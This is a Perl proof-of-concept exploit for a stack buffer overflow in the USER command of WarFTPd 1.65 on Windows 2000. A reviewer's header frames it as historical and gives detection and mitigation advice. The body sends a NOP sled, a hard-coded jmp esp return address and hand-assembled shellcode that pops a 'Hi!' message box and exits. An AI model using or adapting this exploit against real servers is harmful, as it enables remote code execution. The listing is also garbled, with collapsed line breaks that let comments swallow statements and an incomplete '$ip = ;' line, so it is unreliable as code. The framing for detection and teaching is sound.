# NOTE(review): Historical proof-of-concept for a stack buffer overflow in the
# USER command of WarFTPd 1.65 on Windows 2000 (per the banner printed below).
# Every address it carries (the "jmp esp" return address and the Kernel32 /
# MSVCRT entry points named in the comments) is hard-coded for one specific
# library build, so the listing is build-specific and not portable; its value
# today is as a signature for detection engineering and as a teaching example
# of why unchecked command-argument lengths were fatal in pre-ASLR software.
# Detection/mitigation: the observable wire artefact is a "USER " argument of
# several hundred bytes consisting mostly of 0x90, followed by a short binary
# payload - trivially matchable by an IDS rule or by an FTP daemon enforcing a
# sane maximum username length. The affected server version is long
# unsupported and should simply be retired rather than mitigated.
# Code-quality notes (the listing is kept byte-for-byte, nothing is repaired):
# no `use strict`/`use warnings`, a bareword filehandle CLIENT, the socket()
# and send() return values are never checked, and the text as rendered on this
# page is not syntactically complete - `$ip = ;` has lost its read expression
# and the original line breaks were collapsed during extraction, so `#`
# comments now swallow the statements that follow them on the same line.
use IO::Socket; $port=21; $|=1; #Kernel32 jmp esp 7754a3ab #Kernel32 MessageBoxA 77e375d5 #MSVCRT c_exit 78003985 print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n"; print "\tEnter The Target IP :"; $ip = ; chomp $ip; $host = inet_aton($ip); $ServerAddr = sockaddr_in($port, $host); $protocol_name = "tcp"; socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp')); select(CLIENT); $|=1; select(STDOUT); if(connect(CLIENT, $ServerAddr)) { send(CLIENT,"user ",0); send(CLIENT,"\x90"x485,0); #485 nops to overwrite EIP send(CLIENT,"\xab\xa3\x54\x77",0); #Overwriting EIP with "jmp,esp" address via Kernel32.dll send(CLIENT,"\x90"x5,0); #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c send(CLIENT,"\x55",0); #push ebp - starting something new send(CLIENT,"\x8b\xec",0); #mov ebp,esp send(CLIENT,"\x33\xff",0); #xor edi,edi - edi = 0 send(CLIENT,"\x57",0); #push edi send(CLIENT,"\xc6\x45\xfc\x48",0); #mov byte ptr [ebp-0x4],0x6f - H send(CLIENT,"\xc6\x45\xfd\x69",0); #mov byte ptr [ebp-0x3],0x78 - i send(CLIENT,"\xc6\x45\xfe\x21",0); #mov byte ptr [ebp-0x2],0x21 - ! send(CLIENT,"\xba\xd5\x75\xe3\x77",0); #mov edx, 0x77e375d5 - MessageBoxA to edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x57",0); #push edi send(CLIENT,"\x8d\x55\xfc",0); #lea edx,[ebp-0x4] - move Hi! 
to edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x57",0); #push edi send(CLIENT,"\xff\x55\xf8",0); #call dword ptr [ebp-0x8] send(CLIENT,"\x55",0); #push ebp - Start the exit stuff so we don't crash send(CLIENT,"\x8b\xec",0); #move ebp,esp send(CLIENT,"\xba\x86\x41\x01\x89",0); #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls send(CLIENT,"\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null send(CLIENT,"\x52",0); #push edx send(CLIENT,"\x33\xc0",0); #xor eax,eax send(CLIENT,"\x50",0); #push eax send(CLIENT,"\xff\x55\xfc",0); #call dword ptr [ebp-0x4] send(CLIENT,"\n",0); close(CLIENT); }